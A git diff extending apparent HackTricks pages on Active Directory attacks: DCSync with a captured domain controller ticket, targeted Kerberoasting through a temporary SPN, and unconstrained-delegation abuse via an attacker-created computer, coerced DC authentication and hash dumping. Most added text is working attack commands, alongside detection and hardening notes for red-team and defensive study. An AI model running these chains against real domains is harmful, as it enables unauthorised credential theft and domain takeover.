diff --git a/src/windows-hardening/active-directory-methodology/dcsync.md b/src/windows-hardening/active-directory-methodology/dcsync.md index 02c665fed..4a2d8d1f0 100644 --- a/src/windows-hardening/active-directory-methodology/dcsync.md +++ b/src/windows-hardening/active-directory-methodology/dcsync.md @@ -35,6 +35,24 @@ secretsdump.py -just-dc :@ -outputfile dcsync_hashes [-history] #To dump password history, may be helpful for offline password cracking ``` +### DCSync using a captured DC machine TGT (ccache) + +In unconstrained-delegation export-mode scenarios, you may capture a Domain Controller machine TGT (e.g., `DC1$@DOMAIN` for `krbtgt@DOMAIN`). You can then use that ccache to authenticate as the DC and perform DCSync without a password. + +```bash +# Generate a krb5.conf for the realm (helper) +netexec smb --generate-krb5-file krb5.conf +sudo tee /etc/krb5.conf < krb5.conf + +# netexec helper using KRB5CCNAME +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + netexec smb --use-kcache --ntds + +# Or Impacket with Kerberos from ccache +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + secretsdump.py -just-dc -k -no-pass / -dc-ip +``` + `-just-dc` generates 3 files: - one with the **NTLM hashes** @@ -70,8 +88,6 @@ Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveG - [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync) - [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/) +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html {{#include ../../banners/hacktricks-training.md}} - - - diff --git a/src/windows-hardening/active-directory-methodology/kerberoast.md b/src/windows-hardening/active-directory-methodology/kerberoast.md index b376acd3c..2e55528dd 100644 --- a/src/windows-hardening/active-directory-methodology/kerberoast.md +++ b/src/windows-hardening/active-directory-methodology/kerberoast.md @@ -155,6 +155,42 @@ Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=4} Set-ADUser -Identity -Replace @{msDS-SupportedEncryptionTypes=28} ``` +#### Targeted Kerberoast via GenericWrite/GenericAll over a user (temporary SPN) + +When BloodHound shows that you have control over a user object (e.g., GenericWrite/GenericAll), you can reliably “targeted-roast” that specific user even if they do not currently have any SPNs: + +- Add a temporary SPN to the controlled user to make it roastable. +- Request a TGS-REP encrypted with RC4 (etype 23) for that SPN to favor cracking. +- Crack the `$krb5tgs$23$...` hash with hashcat. +- Clean up the SPN to reduce footprint. + +Windows (PowerView/Rubeus): + +```powershell +# Add temporary SPN on the target user +Set-DomainObject -Identity -Set @{serviceprincipalname='fake/TempSvc-'} -Verbose + +# Request RC4 TGS for that user (single target) +.\Rubeus.exe kerberoast /user: /nowrap /rc4 + +# Remove SPN afterwards +Set-DomainObject -Identity -Clear serviceprincipalname -Verbose +``` + +Linux one-liner (targetedKerberoast.py automates add SPN -> request TGS (etype 23) -> remove SPN): + +```bash +targetedKerberoast.py -d '' -u -p '' +``` + +Crack the output with hashcat autodetect (mode 13100 for `$krb5tgs$23$`): + +```bash +hashcat .hash /path/to/rockyou.txt +``` + +Detection notes: adding/removing SPNs produces directory changes (Event ID 5136/4738 on the target user) and the TGS request generates Event ID 4769. Consider throttling and prompt cleanup. + You can find useful tools for kerberoast attacks here: https://github.com/nidem/kerberoast If you find this error from Linux: `Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)` it’s due to local time skew. Sync to the DC: @@ -233,10 +269,12 @@ asreproast.md ## References +- [https://github.com/ShutdownRepo/targetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled) - Microsoft Security Blog (2024-10-11) – Microsoft’s guidance to help mitigate Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/ - SpecterOps – Rubeus Roasting documentation: https://docs.specterops.io/ghostpack/rubeus/roasting +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md index 41489d19a..fb29992d3 100644 --- a/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md +++ b/src/windows-hardening/active-directory-methodology/unconstrained-delegation.md @@ -58,11 +58,109 @@ Find here other ways to **force an authentication:** printers-spooler-service-abuse.md {{#endref}} +### Abusing Unconstrained Delegation with an attacker-created computer + +Modern domains often have `MachineAccountQuota > 0` (default 10), allowing any authenticated principal to create up to N computer objects. If you also hold the `SeEnableDelegationPrivilege` token privilege (or equivalent rights), you can set the newly created computer to be trusted for unconstrained delegation and harvest inbound TGTs from privileged systems. + +High-level flow: + +1) Create a computer you control + +```bash +# Impacket addcomputer.py (any authenticated user if MachineAccountQuota > 0) +addcomputer.py -computer-name -computer-pass '' -dc-ip /:'' +``` + +2) Make the fake hostname resolvable inside the domain + +```bash +# krbrelayx dnstool.py - add an A record for the host FQDN to point to your listener IP +python3 dnstool.py -u '\\$' -p '' \ + --action add --record . --type A --data \ + -dns-ip +``` + +3) Enable Unconstrained Delegation on the attacker-controlled computer + +```bash +# Requires SeEnableDelegationPrivilege (commonly held by domain admins or delegated admins) +# BloodyAD example +bloodyAD -d -u -p '' --host add uac '$' -f TRUSTED_FOR_DELEGATION +``` + +Why this works: with unconstrained delegation, the LSA on a delegation-enabled computer caches inbound TGTs. If you trick a DC or privileged server to authenticate to your fake host, its machine TGT will be stored and can be exported. + +4) Start krbrelayx in export mode and prepare the machine NT hash + +```bash +# Compute NT hash (MD4 over UTF-16LE) of the machine account password +python3 - << 'PY' +password = '' +import hashlib +print(hashlib.new('md4', password.encode('utf-16le')).hexdigest()) +PY +# Launch krbrelayx to export any inbound TGTs +python3 krbrelayx.py -hashes : +``` + +5) Coerce authentication from the DC/servers to your fake host + +```bash +# netexec (CME fork) coerce_plus module supports multiple coercion vectors +# Common options: METHOD=PrinterBug|PetitPotam|DFSCoerce|MSEven +netexec smb -u '$' -p '' -M coerce_plus -o LISTENER=. METHOD=PrinterBug +``` + +krbrelayx will save ccache files when a machine authenticates, for example: + +``` +Got ticket for DC1$@DOMAIN.TLD [krbtgt@DOMAIN.TLD] +Saving ticket in DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache +``` + +6) Use the captured DC machine TGT to perform DCSync + +```bash +# Create a krb5.conf for the realm (netexec helper) +netexec smb --generate-krb5-file krb5.conf +sudo tee /etc/krb5.conf < krb5.conf + +# Use the saved ccache to DCSync (netexec helper) +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + netexec smb --use-kcache --ntds + +# Alternatively with Impacket (Kerberos from ccache) +KRB5CCNAME=DC1$@DOMAIN.TLD_krbtgt@DOMAIN.TLD.ccache \ + secretsdump.py -just-dc -k -no-pass / -dc-ip +``` + +Notes and requirements: + +- `MachineAccountQuota > 0` enables unprivileged computer creation; otherwise you need explicit rights. +- Setting `TRUSTED_FOR_DELEGATION` on a computer requires `SeEnableDelegationPrivilege` (or domain admin). +- Ensure name resolution to your fake host (DNS A record) so the DC can reach it by FQDN. +- Coercion requires a viable vector (PrinterBug/MS-RPRN, EFSRPC/PetitPotam, DFSCoerce, MS-EVEN, etc.). Disable these on DCs if possible. + +Detection and hardening ideas: + +- Alert on Event ID 4741 (computer account created) and 4742/4738 (computer/user account changed) when UAC `TRUSTED_FOR_DELEGATION` is set. +- Monitor for unusual DNS A-record additions in the domain zone. +- Watch for spikes in 4768/4769 from unexpected hosts and DC-authentications to non-DC hosts. +- Restrict `SeEnableDelegationPrivilege` to a minimal set, set `MachineAccountQuota=0` where feasible, and disable Print Spooler on DCs. Enforce LDAP signing and channel binding. + ### Mitigation - Limit DA/Admin logins to specific services - Set "Account is sensitive and cannot be delegated" for privileged accounts. -{{#include ../../banners/hacktricks-training.md}} +## References +- HTB: Delegate — SYSVOL creds → Targeted Kerberoast → Unconstrained Delegation → DCSync to DA: https://0xdf.gitlab.io/2025/09/12/htb-delegate.html +- harmj0y – S4U2Pwnage: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ +- ired.team – Domain compromise via unrestricted delegation: https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation +- krbrelayx: https://github.com/dirkjanm/krbrelayx +- Impacket addcomputer.py: https://github.com/fortra/impacket +- BloodyAD: https://github.com/CravateRouge/bloodyAD +- netexec (CME fork): https://github.com/Pennyw0rth/NetExec +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file